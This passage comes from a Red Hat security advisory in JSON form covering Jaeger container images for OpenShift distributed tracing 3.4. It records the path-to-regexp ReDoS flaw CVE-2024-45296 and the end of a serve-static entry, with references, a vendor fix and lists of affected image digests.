Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "serve-static: Improper Sanitization in serve-static" }, { "cve": "CVE-2024-45296", "cwe": { "id": "CWE-1333", "name": "Inefficient Regular Expression Complexity" }, "discovery_date": "2024-09-09T19:20:18.127723+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2310908" } ], "notes": [ { "category": "description", "text": "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).", "title": "Vulnerability description" }, { "category": "summary", "text": "path-to-regexp: Backtracking regular expressions cause ReDoS", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2024-45296" }, { "category": "external", "summary": "RHBZ#2310908", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2024-45296", "url": "https://www.cve.org/CVERecord?id=CVE-2024-45296" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296" }, { "category": "external", "summary": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", "url": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f" }, { "category": "external", "summary": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", "url": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6" }, { "category": "external", "summary": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", "url": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j" } ], "release_date": "2024-09-09T19:15:13.330000+00:00", "remediations": [ { "category": "vendor_fix", "date": "2024-12-11T16:47:10+00:00", "details": "For details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.17/h tml/operators/administrator-tasks#olm-upgrading-operators", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2024:10962" }, { "category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 